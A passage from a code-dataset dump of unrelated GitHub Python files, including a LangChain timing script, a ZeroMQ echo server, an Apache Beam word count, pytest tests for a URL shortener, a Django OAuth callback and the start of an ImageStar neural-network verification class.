chat(messages)\n chat_model_measurer.end_time(\"messages_in_message_out_with_system_message\")\n\n print(result)\n print(\n (\n \"response time: \"\n f\"{chat_model_measurer.time_result('messages_in_message_out_with_system_message')}\"\n )\n )\n\n\ndef batch_calls_richer_outputs():\n batch_messages = [\n [\n SystemMessage(\n content=\"You are a helpful assistant that translates English to Japanese.\"\n ),\n HumanMessage(\n content=\"I love programming\",\n ),\n ],\n [\n SystemMessage(\n content=\"You are a helpful assistant that translates English to Japanese.\"\n ),\n HumanMessage(\n content=\"I love artificial intelligence.\",\n ),\n ],\n ]\n\n chat_model_measurer.start_time(\"batch_calls_richer_outputs\")\n result = chat.generate(batch_messages)\n chat_model_measurer.end_time(\"batch_calls_richer_outputs\")\n\n print(result)\n print(\n (\n \"response time: \"\n f\"{chat_model_measurer.time_result('batch_calls_richer_outputs')}\"\n )\n )\n\n\nif __name__ == \"__main__\":\n messages_in_message_out_without_system_message()\n messages_in_message_out_with_system_message()\n batch_calls_richer_outputs()\n results = chat_model_measurer.all_time_result(\n \"messages_in_message_out_without_system_message\"\n )\n for name, response_time in results.items():\n print(f\"{name}: {response_time}\")\n","repo_name":"S-Tatsuya/survey_langchain","sub_path":"measurement/src/chat_model.py","file_name":"chat_model.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3017387775","text":"import datetime\n\nfrom server import data, util\nfrom server.apis import geo\n\ndef spoolRevToFixed(it):\n try:\n while True:\n it.prev()\n if it.current().startTime is not None:\n return it\n except StopIteration:\n return None\n\nclass CommutePlanner:\n def __init__(self, options=['walking', 'walking', 'bicycling', 'transit']):\n self.options = options\n\n def plan(self, a, b, arrival_time, g):\n fastest = None\n for o in self.options:\n l = g.directions(a, b, arrival_time, mode=o)[0][\"legs\"][0]\n duration = datetime.timedelta(seconds=l[\"duration\"][\"value\"])\n if \"departure_time\" in l:\n startTime = datetime.datetime.fromtimestamp(l[\"departure_time\"][\"value\"])\n else:\n startTime = arrival_time - duration\n\n if fastest is None or duration < fastest.duration:\n fastest = data.Event(startTime, duration, a, \"commute by \"+o)\n\n return fastest\n\n\ndef plan(timeline, g, cp):\n # we plan backwards\n it = spoolRevToFixed(timeline.end())\n if it is None:\n return timeline\n\n s = data.State(it.current())\n\n newEvents = []\n try:\n while True:\n it.prev()\n if it.current().location is not None and s.location != it.current().location:\n e = cp.plan(it.current().location, s.location, s.now, g)\n s.updateRev(e)\n newEvents.append(e)\n\n e = it.current()\n s.updateRev(e)\n e.startTime = s.now\n e.location = s.location\n newEvents.append(e)\n\n except StopIteration:\n pass\n\n return data.Timeline(reversed(newEvents))\n","repo_name":"Wassasin/superplan","sub_path":"server/plan.py","file_name":"plan.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42491884185","text":"from subprocess import call\nfrom pathlib import Path\nfrom os import walk\nimport hashlib\nimport argparse\nimport sys\nimport logging\nfrom shutil import copyfile\nfrom filecmp import cmp as diff\n\n\ndef run_system_command(cmd: str,\n shell: bool = False,\n err_msg: str = None,\n verbose: bool = True,\n split: bool = True,\n stdout=None,\n stderr=None) -> int:\n \"\"\"\n :param cmd: A string with the terminal command invoking an external program\n :param shell: Whether the command should be executed through the shell\n :param err_msg: Error message to print if execution fails\n :param verbose: Whether to print the command to the standard output stream\n :param split: Whether to split the tokens in the command string\n :param stdout: file pointer to redirect stdout to\n :param stderr: file pointer to redirect stderr to\n :return: Return code\n \"\"\"\n if verbose:\n sys.stdout.write(\"Run cmd: {}\\n\".format(cmd))\n if split:\n cmd = cmd.split()\n rc = call(cmd, shell=shell, stdout=stdout, stderr=stderr)\n if err_msg and rc:\n sys.stderr.write(err_msg)\n exit(rc)\n return rc\n\n\ndef setup_logging(args):\n msg_format = '%(asctime)s:%(levelname)s: %(message)s'\n formatter = logging.Formatter(msg_format, datefmt='%H:%M:%S')\n handler = logging.StreamHandler()\n handler.setFormatter(formatter)\n logging.getLogger().addHandler(handler)\n logging.getLogger().setLevel(logging.DEBUG)\n\n\ndef check_makefile(args):\n options = [\"makefile\", \"./Makefile\"]\n rules = [\"build\", \"run-p1\", \"run-p2\", \"run-best\"]\n\n for file in options:\n file = Path(file)\n if file.exists():\n logging.info(\"Found Makefile!\")\n\n with open(file, \"r\") as f:\n content = f.read()\n for rule in rules:\n if rule not in content:\n logging.warning(\n \"Rule {} not found in Makefile!\".format(rule))\n elif rule == \"build\":\n call(\"make build\", shell=True)\n break\n else:\n logging.critical(\"No Makefile found!\")\n\n\ndef check_readme(args):\n options = [\"README\", \"readme\", \"Readme\"]\n\n for file in options:\n file = Path(file)\n if file.exists():\n logging.info(\"Found Readme\")\n with open(file, \"r\") as f:\n content = f.read()\n if len(content) < 10:\n logging.warning(\n \"Readme file is very short - be sure to include all the required information\")\n break\n else:\n logging.critical(\"No README file found!\")\n\n\ndef check_tests(args):\n tests = []\n input_path = Path(\"./in\")\n if args.unique_tests:\n output_path = Path(\"./out/{}\".format(args.algo))\n else:\n output_path = Path(\"./out\")\n\n if not input_path.exists() or not input_path.is_dir():\n logging.critical(\"No folder for the input tests found!\")\n return None\n\n if not output_path.exists() or not output_path.is_dir():\n logging.critical(\"No folder for the output tests found!\")\n return None\n\n for (_, _, input_tests) in walk(input_path):\n\n input_tests = [file for file in input_tests if file.endswith(\".in\")]\n if len(input_tests) < 10:\n logging.critical(\n \"Only {} input tests generated!\".format(len(input_tests)))\n else:\n logging.info(\"Found {} tests.\".format(len(input_tests)))\n\n unique = set()\n for test in input_tests:\n contents = open(input_path / test, \"r\").read().encode(\"utf-8\")\n checksum = hashlib.md5(contents).hexdigest()\n unique.add(checksum)\n\n if len(input_tests) != len(unique):\n logging.critical(\n \"Unique tests: {} / {}!\".format(len(unique), len(input_tests)))\n\n for (_, _, output_tests) in walk(output_path):\n\n output_tests = [file for file in output_tests if file.endswith(\".out\")]\n\n for test in output_tests:\n test_id = test[:-4].replace(\"test\", \"\")\n test_out = \"test{}.out\".format(test_id)\n if test_out not in output_tests:\n logging.critical(\n \"Missing output test for test {}!\".format(test_id))\n else:\n tests.append((test_id,\n input_path / \"test{}.in\".format(test_id),\n output_path / \"test{}.out\".format(test_id)))\n\n return tests\n\n\ndef check_folder_structure(args):\n check_makefile(args)\n check_readme(args)\n return check_tests(args)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--algo', type=str,\n help=\"Tells makefile which rule to run (e.g. --algo p1 will trigger rule make run-p1\",\n required=True)\n parser.add_argument('--unique-tests', dest='unique_tests',\n help=\"Set this to True if each algorithm has different tests\",\n action='store_true')\n parser.add_argument('--task', type=int,\n help=\"Task ID (e.g. --task 1 for Max Flow\",\n required=True)\n parser.add_argument('--run-test', type=int)\n parser.set_defaults(unique_tests=False)\n args = parser.parse_args()\n setup_logging(args)\n\n tests = check_folder_structure(args)\n for id, input_path, output_path in tests:\n logging.info(\"Running run-{} test {}..\".format(args.algo, id))\n copyfile(input_path, \"./test.in\")\n call(\"make run-{}\".format(args.algo), shell=True)\n if not diff(output_path, \"./test.out\"):\n logging.critical(\"Error trying to run test {}\".format(id))\n logging.info(\"Done!\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AlexandraImbrisca/example","sub_path":"unique_tests/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":5939,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39679109942","text":"# -*- coding: utf-8 -*-\nfrom commons.repository import Repository\nfrom interets_parlementaires.db import mysql_db\n\nParlementarianDataType = {\n 1: u'donnees_personnelles',\n 2: u'activites_professionnelles',\n 3: u'activites_pro_5ans',\n 4: u'activites_conseil',\n 5: u'organes_dirigeants',\n 6: u'participations_financieres',\n 7: u'activites_conjoint',\n 8: u'fonctions_benevoles',\n 9: u'fonctions_mandats',\n 10: u'collaborateurs',\n 11: u'activites_conservees',\n 12: u'observations',\n 13: u'dates_reception',\n}\n\n\nclass ParlementaireRepository(Repository):\n def __init__(self, db=mysql_db):\n super(ParlementaireRepository, self).__init__(db)\n\n def get_parlementaires(self, ptype='all'):\n if ptype == 'all':\n like = '%'\n elif ptype == 'depute':\n like = 'http://www.nosdeputes.fr%'\n elif ptype == 'senateur':\n like = 'http://www.nossenateurs.fr%'\n\n sql = \"SELECT DISTINCT parlementaire FROM documents WHERE parlementaire_avatarurl LIKE %s\"\n self.cursor.execute(sql, (like,))\n return [row['parlementaire'] for row in self.cursor.fetchall()]\n\n def get_data_by_type(self, type):\n sql = \"\"\"SELECT parlementaire, data FROM tasks, documents\n WHERE documents.selected_task = tasks.id AND done = 1 AND type = %s\n \"\"\"\n self.cursor.execute(sql, (type,))\n return self.cursor.fetchall()\n\n\n","repo_name":"fmassot/rc-tools","sub_path":"interets_parlementaires/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38337173854","text":"#!/usr/bin/env python3\n\n\nimport zmq\nimport sys\nimport json\n\n# from zhelpers import dump\n\n\ndef loopback(header_dict, zmq_message):\n \"\"\" Return back the event. \"\"\"\n msg_list = []\n resp_dict = {\"control\": \"back\"}\n next_pos = 0\n json_header = json.dumps(resp_dict)\n msg_list.insert(next_pos, json_header.encode())\n next_pos += 1\n\n if 'True' == header_dict.get('payload', 'False'):\n msg_list.insert(next_pos, zmq_message[1])\n next_pos += 1\n pass\n msg_list.insert(2, '[END]'.encode())\n next_pos += 1\n print(\"Looping Back...\")\n return msg_list\n\n\ndef ping(header_dict, zmq_message):\n \"\"\" Answer ping. \"\"\"\n msg_list = []\n resp_dict = {\"control\": \"pong\"}\n next_pos = 0\n json_header = json.dumps(resp_dict)\n msg_list.insert(next_pos, json_header.encode())\n next_pos += 1\n\n if 'True' == header_dict.get('payload', 'False'):\n msg_list.insert(next_pos, zmq_message[1])\n next_pos += 1\n pass\n msg_list.insert(2, '[END]'.encode())\n next_pos += 1\n print(\"Pinging...\")\n return msg_list\n\n\ndef handle_message(zmq_message):\n \"\"\" Handle all messages and return and event. \"\"\"\n evt_dict = json.loads(zmq_message[0].decode())\n dispatcher_ftn = control_dict[evt_dict['control']]\n evt_response = dispatcher_ftn(evt_dict, zmq_message)\n return evt_response\n\n\ndef terminate(zmq_message):\n \"\"\" End the server. \"\"\"\n if not zmq_message:\n return True\n evt_dict = json.loads(zmq_message[0].decode())\n return 'terminate' == evt_dict['control']\n\ncontrol_dict = {'loop': loopback,\n 'ping': ping,\n 'terminate': terminate\n }\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print('I: Syntax: %s ' % sys.argv[0])\n sys.exit(0)\n\n endpoint = sys.argv[1]\n context = zmq.Context()\n server = context.socket(zmq.REP)\n server.bind(endpoint)\n\n print('I: Echo service is ready at %s' % endpoint)\n while True:\n msg = server.recv_multipart()\n if terminate(msg):\n print(\"Terminating...\")\n break # Interrupted\n msg_list = handle_message(msg)\n # dump(msg_list)\n server.send_multipart(msg_list)\n\n server.setsockopt(zmq.LINGER, 0) # Terminate immediately\n","repo_name":"michelav/cloud-detours","sub_path":"core/tests/loopback.py","file_name":"loopback.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"33690155764","text":"# Read csv file to console\n\nimport csv\n\nwith open('test.txt', 'r') as my_file:\n words = my_file.read()\n\n print(words)\n\n\n\n\n# Read file and count how many times the same word appears\n\nfile = open('test.txt', 'r')\n\nfrom collections import Counter\nwordCount = Counter(file.read().split())\n\nfor item in wordCount.items(): \n # the {} are formatters and items is put inside the brackets\n print(\"{}\\t{}\".format(*item))\n\n\n\n\n# Read file and count how many are in each category\n\nfrom collections import Counter\n\ndef main():\n with open('test2.txt') as file:\n for line in file:\n line = line.split(\"/\")[2]\n print(line)\n \nmain()\n\n# while line:\n# categoryCount = Counter(line)\n\n# for item in categoryCount.items():\n# print(\"{}\\t{}\".format(*item))\n","repo_name":"oliviaclyde/hello-world","sub_path":"practice-python/Read_File.py","file_name":"Read_File.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17168038689","text":"# beam gs text to gs text\n\nimport apache_beam as beam\nimport re\n\nPROJECT = 'nickapi-184104'\nBUCKET = 'mysb'\n\n\ndef run():\n argv = [\n '--project={0}'.format(PROJECT),\n '--job_name=examplejob2',\n '--save_main_session',\n '--staging_location=gs://{0}/staging/'.format(BUCKET),\n '--temp_location=gs://{0}/staging/'.format(BUCKET),\n '--runner=DataflowRunner'\n ]\n\n p = beam.Pipeline(argv=argv)\n\n inp = 'gs://{0}/test/kl.txt'.format(BUCKET)\n output_prefix = 'gs://{0}/test/output'.format(BUCKET)\n\n (p\n | beam.io.ReadFromText(inp)\n | beam.FlatMap(lambda x: re.findall(r'[A-Za-z\\']+', x))\n | beam.combiners.Count.PerElement()\n | beam.Map(lambda word_count: '%s: %s' % (word_count[0],\n word_count[1]))\n | beam.io.WriteToText(output_prefix)\n )\n\n p.run()\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"nrkfeller/traffic_chicago","sub_path":"test/word_count_on_cloud.py","file_name":"word_count_on_cloud.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7855393120","text":"input_list1 = [('City', 'Bakı'), ('Brand', 'Infiniti'),\n ('Model', 'Q50'), ('ProdYear', '2020'),\n ('BanType', 'Sedan'),\n ('Color', 'Boz'), ('EngVol', '2.0'),\n ('EngPow', '211'), ('FuelType', 'Benzin'),\n ('RideDist', '0'), ('Gearbox', 'Avtomat'),\n ('Transmission', 'Arxa'), ('Barter', '1'),\n ('YungulLehimliDiskler', '1'), ('Condisioner', '1'),\n ('Lyuk', '1'), ('RainSensor', '1'),\n ('MerkeziQapanma', '1'), ('ParKRadar', '1'),\n ('LeatherSalon', '1'), ('SeatHeat', '1'),\n ('KsenonLamps', '1'),\n ('YanPerdeler', '1'), ('BackVisionCam', '1'), ('ABS', '1')]\n# $38.500\n\ninput_list2 = [('City', 'Bakı'), ('Brand', 'Kia'),\n ('Model', 'Cerato'), ('ProdYear', '2011'),\n ('BanType', 'Sedan'),\n ('Color', 'Qara'), ('EngVol', '1.6'),\n ('EngPow', '126'), ('FuelType', 'Benzin'),\n ('RideDist', '133000'), ('Gearbox', 'Avtomat'),\n ('Transmission', 'Ön'),\n ('YungulLehimliDiskler', '1'), ('Condisioner', '1'),\n ('ABS', '1'), ('ParKRadar', '1'),\n ('BackVisionCam', '1')] # 16000\n\ninput_list3 = [('City', 'Bakı'), ('Brand', 'Mercedes'),\n ('Model', 'E 280'), ('ProdYear', '2008'),\n ('BanType', 'Sedan'),\n ('Color', 'Qara'), ('EngVol', '3.0'),\n ('EngPow', '231'), ('FuelType', 'Benzin'),\n ('RideDist', '275000'), ('Gearbox', 'Avtomat'),\n ('Transmission', 'Arxa'),\n ('YungulLehimliDiskler', '1'), ('Condisioner', '1'),\n ('Lyuk', '1'), ('RainSensor', '1'),\n ('MerkeziQapanma', '1'), ('ParKRadar', '1'),\n ('LeatherSalon', '1'), ('SeatHeat', '1'),\n ('SeatVentilation', '1'), ('KsenonLamps', '1'),\n ('YanPerdeler', '1'), ('BackVisionCam', '1'), ('ABS', '1')]\n# $14.300\n\ninput_list4 = [('City', 'Bakı'), ('Brand', 'Chevrolet'),\n ('Model', 'Cruze'), ('ProdYear', '2014'),\n ('BanType', 'Sedan'),\n ('Color', 'Yaş Asfalt'), ('EngVol', '1.4'),\n ('EngPow', '141'), ('FuelType', 'Benzin'),\n ('RideDist', '118000'), ('Gearbox', 'Avtomat'),\n ('Transmission', 'Ön'),\n ('Barter', '1'),\n ('YungulLehimliDiskler', '1'), ('Condisioner', '1'),\n ('ABS', '1'), ('ParKRadar', '1'),\n ('RainSensor', '1'), ('MerkeziQapanma', '1'),\n ('SeatVentilation', '1'), ('LeatherSalon', 1)] # 15.500\n\ninput_list5 = [('City', 'Sumqayıt'), ('Brand', 'Mercedes'),\n ('Model', 'E 320'), ('ProdYear', '2000'),\n ('BanType', 'Sedan'),\n ('Color', 'Bənövşəyi'), ('EngVol', '3.2'),\n ('EngPow', '224'), ('FuelType', 'Benzin'),\n ('RideDist', '248000'), ('Gearbox', 'Avtomat'),\n ('Transmission', 'Arxa'), ('Barter', '1'),\n ('Credit', '1'),\n ('YungulLehimliDiskler', '1'), ('Condisioner', '1'),\n ('Lyuk', '1'), ('RainSensor', '1'),\n ('MerkeziQapanma', '1'), ('ParKRadar', '1'),\n ('LeatherSalon', '1'), ('SeatHeat', '1'),\n ('KsenonLamps', '1'),\n ('YanPerdeler', '1'), ('BackVisionCam', '1'), ('ABS', '1'),\n ('SeatVentilation', '1')] #16.900\n\ninput_list6 = [('City', 'Bakı'), ('Brand', 'Toyota'),\n ('Model', 'Land Cruiser'), ('ProdYear', '2010'),\n ('BanType', 'Offroader / SUV'),\n ('Color', 'Qara'), ('EngVol', '4.7'),\n ('EngPow', '288'), ('FuelType', 'Benzin'),\n ('RideDist', '214000'), ('Gearbox', 'Avtomat'),\n ('Transmission', 'Tam'), \n ('YungulLehimliDiskler', '1'), ('Condisioner', '1'),\n ('Lyuk', '1'), ('RainSensor', '1'),\n ('MerkeziQapanma', '1'), ('ParKRadar', '1'),\n ('LeatherSalon', '1'), ('SeatHeat', '1'),\n ('KsenonLamps', '1'),\n ('YanPerdeler', '1'), ('BackVisionCam', '1'), ('ABS', '1'),\n ('SeatVentilation', '1')] #$36.500\n\ninput_list7 = [('City', 'Bakı'), ('Brand', 'BMW'),\n ('Model', '320'), ('ProdYear', '1998'),\n ('BanType', 'Sedan'),\n ('Color', 'Göy'), ('EngVol', '2.0'),\n ('EngPow', '150'), ('FuelType', 'Benzin'),\n ('RideDist', '266626'), ('Gearbox', 'Mexaniki'),\n ('Transmission', 'Arxa'), \n ('YungulLehimliDiskler', '1'), ('Condisioner', '1'),\n ('Lyuk', '1'), ('RainSensor', '1'),\n ('MerkeziQapanma', '1'), ('ParKRadar', '1'),\n ('LeatherSalon', '1'), ('SeatHeat', '1'),\n ('KsenonLamps', '1'),\n ('ABS', '1'),\n ('SeatVentilation', '1')]\n\ninput_list8 = [('City', 'Bakı'), ('Brand', 'Mercedes-Maybach'),\n ('Model', 'S 500'), ('ProdYear', '2015'),\n ('BanType', 'Sedan'),\n ('Color', 'Qara'), ('EngVol', '4.7'),\n ('EngPow', '455'), ('FuelType', 'Benzin'),\n ('RideDist', '78000'), ('Gearbox', 'Avtomat'),\n ('Transmission', 'Arxa'), \n ('Barter', '1'),\n ('YungulLehimliDiskler', '1'), ('Condisioner', '1'),\n ('Lyuk', '1'), ('RainSensor', '1'),\n ('MerkeziQapanma', '1'), ('ParKRadar', '1'),\n ('LeatherSalon', '1'), ('SeatHeat', '1'),\n ('KsenonLamps', '1'),\n ('ABS', '1'),\n ('SeatVentilation', '1')]\n\n\ninput_list8 = [('City', 'Bakı'), ('Brand', 'Mercedes-Maybach'),\n ('Model', 'S 500'), ('ProdYear', '2015'),\n ('BanType', 'Sedan'),\n ('Color', 'Qara'), ('EngVol', '4.7'),\n ('EngPow', '455'), ('FuelType', 'Benzin'),\n ('RideDist', '78000'), ('Gearbox', 'Avtomat'),\n ('Transmission', 'Arxa'), \n ('Barter', '1'),\n ('YungulLehimliDiskler', '1'), ('Condisioner', '1'),\n ('Lyuk', '1'), ('RainSensor', '1'),\n ('MerkeziQapanma', '1'), ('ParKRadar', '1'),\n ('LeatherSalon', '1'), ('SeatHeat', '1'),\n ('KsenonLamps', '1'),\n ('ABS', '1'),\n ('SeatVentilation', '1')]\n\ninput_list9 = [('City', 'Bakı'), ('Brand', 'Toyota'),\n ('Model', 'Corolla'), ('ProdYear', '2021'),\n ('BanType', 'Sedan'),\n ('Color', 'Ağ'), ('EngVol', '1.6'),\n ('EngPow', '124'), ('FuelType', 'Benzin'),\n ('RideDist', '12000'), ('Gearbox', 'Avtomat'),\n ('Transmission', 'Ön'), \n ('Barter', '1'),\n ('YungulLehimliDiskler', '1'), ('Condisioner', '1'),\n ('RainSensor', '1'),\n ('MerkeziQapanma', '1'), ('ParKRadar', '1'),\n ('KsenonLamps', '1'),\n ('ABS', '1'),\n ]\n\n\n\n\n\n\n","repo_name":"DevTeymur/Car-price-prediction-turbo.az","sub_path":"Machine_Learning/test_cases.py","file_name":"test_cases.py","file_ext":"py","file_size_in_byte":7132,"program_lang":"python","lang":"nl","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6086349657","text":"from pathlib import Path\nimport pytest\n\nfrom src.database import Database\n\n\nclass TestDatabase:\n def test_initialize(self, tmp_path: Path):\n db_path = tmp_path / \"test.db\"\n\n Database.initialize(str(db_path))\n\n assert Database.db.get_tables() == [\"link\"]\n\n Database.terminate()\n\n @pytest.mark.usefixtures(\"pre_init_db\")\n def test_set_and_fetch(self):\n original_url = \"https://github.com/BURG3R5/\"\n\n short_back_half = Database.create_short_link(original_url)\n received_url = Database.get_original_url(short_back_half)\n\n assert received_url == original_url\n\n @pytest.mark.usefixtures(\"pre_init_db\")\n def test_fetch_fails_None(self):\n received_url = Database.get_original_url(\"this-link-doesnt-exist-1312\")\n\n assert received_url is None\n\n # @pytest.mark.usefixtures(\"pre_init_db\")\n def test_delete_link(self, my_short_link):\n Database.remove_link(my_short_link)\n\n assert Database.get_original_url(my_short_link) is None\n\n @pytest.mark.usefixtures(\"pre_init_db\")\n def test_delete_fails_silently(self):\n Database.remove_link(\"this-link-doesnt-exist-1312\")\n\n\n# region FIXTURES\n\n\n@pytest.fixture\ndef pre_init_db():\n Database.initialize(\":memory:\")\n\n yield\n\n Database.terminate()\n\n\n@pytest.fixture\ndef my_short_link(pre_init_db):\n back_half = Database.create_short_link(\"https://github.com/BURG3R5/\")\n\n yield back_half\n\n Database.remove_link(back_half)\n\n\n# endregion\n","repo_name":"BURG3R5/url-shortener","sub_path":"tests/database/test_database.py","file_name":"test_database.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15766209683","text":"def unique(list):\n spList = list.split(\",\")\n uniqueList = []\n for i in spList:\n if i not in uniqueList:\n uniqueList.append(i)\n for i in range(uniqueList.count(\"\")):\n uniqueList.remove(\"\")\n result = \"\"\n for i in uniqueList:\n result = result + i + \",\"\n return result\n","repo_name":"EvgenijMutin/Merge","sub_path":"uniqueList.py","file_name":"uniqueList.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71040450409","text":"# Create your views here.\nfrom django.http import HttpResponse\nfrom django.shortcuts import render_to_response,redirect\nimport urllib2\nimport urllib\nimport json\nclient_id=\"\"\nclient_secret=\"\"\ndef index(request):\n\treturn render_to_response('index.html')\ndef auth(request):\n\tclient_id=request.POST['client_id']\n\tclient_secret=request.POST['client_secret']\n\treturn redirect('http://join.agiliq.com/oauth/authorize?client_id='+client_id+'&redirect_uri=http://localhost:8000/agiliq')\ndef agiliq(request):\n\t#return HttpResponse(request.GET['code'])\n\tcode = request.GET['code']\n\turl = 'http://join.agiliq.com/oauth/access_token?'\n\tvalues = {'client_id' : client_id,\n\t\t\t 'redirect_uri' : 'http://localhost:8000/agiliq',\n\t\t\t 'client_secret' : client_secret,\n\t\t\t 'code': code,}\n\t#return HttpResponse(client_secret)\n\t#data = urllib.urlencode(values)\n\treq = urllib2.Request(url+urllib.urlencode(values))\n\tresponse = urllib2.urlopen(req)\n\tthe_page = response.read()\n\tobj = json.loads(the_page)\n\ttoken=obj['access_token']\n\treturn render_to_response('inp.html', {\n 'access_token': token,\n },)","repo_name":"sreeramnitin/Oauth","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23046734987","text":"#!/usr/bin/python3\nimport numpy as np\nimport gurobipy as gp\nfrom gurobipy import GRB \n\nimport sys\nimport operator\n \nsys.path.insert(0, \"../../../engine/set/star/\")\n \nfrom star import *\n\n############################ ERROR MESSAGES ############################\n\n#INVALID_PARAM_NUMBER_MSG = \"ImageStar does not support this number of parameters\"\n\nERRMSG_INCONSISTENT_CONSTR_DIM = \"Inconsistent dimension between constraint matrix and constraint vector\"\nERRMSG_INCONSISTENT_PRED_BOUND_DIM = \"Number of predicates is different from the size of the lower bound or upper bound predicate vector\"\nERRMSG_INCONSISTENT_BOUND_DIM = \"Invalid lower/upper bound predicate vector, vector should have one column\"\nERRMSG_INVALID_CONSTR_VEC = \"Invalid constraint vector, vector should have one column\"\nERRMSG_INVALID_BASE_MATRIX = \"Invalid basis matrix\"\nERRMSG_INCONSISTENT_BASIS_MATRIX_PRED_NUM = \"Inconsistency between the basis matrix and the number of predicate variables\"\n\nERRMSG_INCONSISTENT_LB_DIM = \"Inconsistent dimension between lower bound image and the constructed imagestar\"\nERRMSG_INCONSISTENT_UB_DIM = \"Inconsistent dimension between upper bound image and the constructed imagestar\"\n\nERRMSG_INCONSISTENT_CENTER_IMG_ATTACK_MATRIX = \"Inconsistency between center image and attack bound matrices\"\nERRMSG_INCONSISTENT_CHANNELS_NUM = \"Inconsistent number of channels between the center image and the bound matrices\"\n\nERRMSG_INCONSISTENT_LB_UB_DIM = \"Inconsistency between lower bound image and upper bound image\"\n\nERRMSG_INVALID_INIT = \"Invalid number of input arguments, (should be from 0, 3, 5 , or 7)\"\n\nERRMSG_IMGSTAR_EMPTY = \"The ImageStar is empty\"\n\nERRMSG_INVALID_PREDICATE_VEC = \"Invalid predicate vector\"\n\nERRMSG_INCONSISTENT_PREDVEC_PREDNUM = \"Inconsistency between the size of the predicate vector and the number of predicates in the imagestar\"\n\nERRMSG_INCONSISTENT_SCALE_CHANNELS_NUM = \"Inconsistent number of channels between scale array and the ImageStar\"\n\nERRMSG_INCONSISTENT_IMGDIM_IMGSTAR = \"Inconsistent dimenion between input image and the ImageStar\"\n\nERRMSG_INVALID_INPUT_IMG = \"Invalid input image\"\n\nERRMSG_INVALID_INPUT_POINT = \"Invalid input point\"\nERRMSG_INVALID_FIRST_INPUT_POINT = \"The first input point is invalid\"\nERRMSG_INVALID_SECOND_INPUT_POINT = \"The second input point is invalid\"\n\nERRMSG_INVALID_VERT_ID = \"Invalid veritical index\"\nERRMSG_INVALID_HORIZ_ID = \"Invalid horizonal index\"\nERRMSG_INVALID_CHANNEL_ID = \"Invalid channel index\"\n\n\n\nESTIMATE_RANGE_STAGE_STARTED = \"Ranges estimation started...\"\nESTIMATE_RANGE_STAGE_OVER = \"Ranges estimation finished...\"\n\nDISPLAY_ON_OPTION = \"disp\"\n############################ PARAMETERS IDS ############################\n\n##### ATTRIBUTES:\nV_ID = 0\nC_ID = 1\nD_ID = 2\nPREDLB_ID = 3\nPREDUB_ID = 4\nIM_LB_ID = 5\nIM_UB_ID = 6\nIM_ID = 7\nLB_ID = 8\nUB_ID = 9\n\nNUMPRED_ID = 10\nHEIGHT_ID = 11\nWIDTH_ID = 12\nNUM_CHANNEL_ID = 13\nFLATTEN_ORDER_ID = 14\n\nLAST_ATTRIBUTE_ID = FLATTEN_ORDER_ID\n\n##### ARGUMENTS:\nVERT_ID = 0\nHORIZ_ID = 1\nCHANNEL_ID = 2\n\nPOINTS_ID = 0\n\nSTART_POINT_ID = 0\nPOOL_SIZE_ID = 1\n\nP1_ID = 0\nP2_ID = 1\n#####################\n\n############################ PARAMETERS NUMBERS ############################\nIMAGESTAR_ATTRIBUTES_NUM = LAST_ATTRIBUTE_ID + 1\nPREDICATE_IMGBOUNDS_INIT_ARGS_NUM = 7\nPREDICATE_INIT_ARGS_NUM = 5\nIMAGE_INIT_ARGS_NUM = 3\nBOUNDS_INIT_ARGS_NUM = 2\n#####################\n\nIM_OFFSET = 7\nIMAGE_INIT_ARGS_OFFSET = IM_ID\nBOUNDS_INIT_ARGS_OFFSET = IM_LB_ID\n\nDEFAULT_DISP_OPTION = \"\"\n\nCOLUMN_FLATTEN = 'F'\n############################## DEFAULT VALUES ##############################\n\nDEFAULT_SOLVER_ARGS_NUM = 3\nCUSTOM_SOLVER_ARGS_NUM = 4\n\n\nclass ImageStar:\n # Class for representing set of images using Star set\n # An image can be attacked by bounded noise. An attacked image can\n # be represented using an ImageStar Set\n # author: Mykhailo Ivashchenko\n # date: 2/14/2022\n\n #=================================================================%\n # a 3-channels color image is represented by 3-dimensional array \n # Each dimension contains a h x w matrix, h and w is the height\n # width of the image. h * w = number of pixels in the image.\n # *** A gray image has only one channel.\n #\n # Problem: How to represent a disturbed(attacked) image?\n # \n # Use a center image (a matrix) + a disturbance matrix (positions\n # of attacks and bounds of corresponding noises)\n #\n # For example: Consider a 4 x 4 (16 pixels) gray image \n # The image is represented by 4 x 4 matrix:\n # IM = [1 1 0 1; 0 1 0 0; 1 0 1 0; 0 1 1 1]\n # This image is attacked at pixel (1,1) (1,2) and (2,4) by bounded\n # noises: |n1| <= 0.1, |n2| <= 0.2, |n3| <= 0.05\n #\n #\n # Lower and upper noises bounds matrices are: \n # LB = [-0.1 -0.2 0 0; 0 0 0 -0.05; 0 0 0 0; 0 0 0 0]\n # UB = [0.1 0.2 0 0; 0 0 0 0.05; 0 0 0 0; 0 0 0 0]\n # The lower and upper bounds matrices also describe the position of \n 